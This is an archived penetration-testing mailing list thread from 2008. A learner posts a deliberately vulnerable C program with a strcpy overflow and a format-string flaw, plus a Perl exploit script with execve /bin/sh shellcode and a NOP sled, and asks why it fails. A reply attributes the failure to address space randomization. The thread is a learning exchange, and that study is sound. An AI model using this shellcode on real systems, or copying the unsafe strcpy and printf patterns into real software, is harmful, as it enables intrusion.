Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Simple Buffer Overflow
From: "Ronald van der Westen" <rvdwesten () gmail com>
Date: Mon, 14 Jan 2008 15:11:32 +0100

Debian 2.6.18 is using Address Space Randomization, this means that
your stack will be at another address every run. It is not possible to
exploit this with a hardcoded return address.


Cheers,
-p

On 10 Jan 2008 02:09:46 -0000,  <loki6 () orange nl> wrote:
Hi there and thank you for reading this,


I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.


As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.


I've created this simple script: "test.c" :


[code]


#include <stdio.h>


int main(int argc, char **argv){


 char buffer[256];


 if (argc == 1) {

  printf("Usage: %s (input)", argv[0]);

 }


 strcpy(buffer, argv[1]);

 printf(buffer);


return 0;

}


[/code]




Then I'm trying to exploit it with:





[code]


#!/usr/bin/perl


$ret = "/x90/x9a/xbf";


$shellcode = "\xb0\x0b".

       "\x99".

       "\x52".

       "\x68\x2f\x2f\x73\x68".

       "\x68\x2f\x62\x69\x6e".

       "\x89\xe3".

       "\x52".

       "\x53".

       "\x89\xe1".

       "\xcd\x80";



$exploit = "\x90" x 235;

$exploit .= $shellcode;

$exploit .= $ret;


system("./a.out $exploit");


[/code]



The shellcode is an execve /bin/sh.

When I run the perl script it simply returns my bash prompt. So the exploit didn't work.


When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" 
process.


Now the funny thing is when I overflow the buffer of a.out in gdb, with:



   run `perl -e 'print "A"x262'`

Program received signal SIGSEGV, Segmentation fault

0x08048412 in main ()


It doesn't overflow the EIP, because when I use:

   i r


It says:


eip    0x8048412     0x8048412  <main+126>



The first time I tried today it overflowed the EIP correctly and I didn't change anything.


ECX is 0x41414141 and

ESP is 0x4141413d

EBP is 0xbf004141


Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended 
Instruction Pointer?


I was wondering if someone was able to help me with this, because I really want to get the hang of this.


I don't know if I got the NOP sled and return address right either, because when using GDB:



    x/s $esp


I get:


0x4141413d:   <Address 0x4141413d out of bounds


I'm kinda stuck from there.


My problem in short:


- How do I get a reliable return address with GDB

- How do I determine the length of the NOP sled

- How do I test shellcode



Thanks for reading this..

Thanks for any help, pointers and advice.


ironmonkey6

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------





-- 
Ronald van der Westen

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]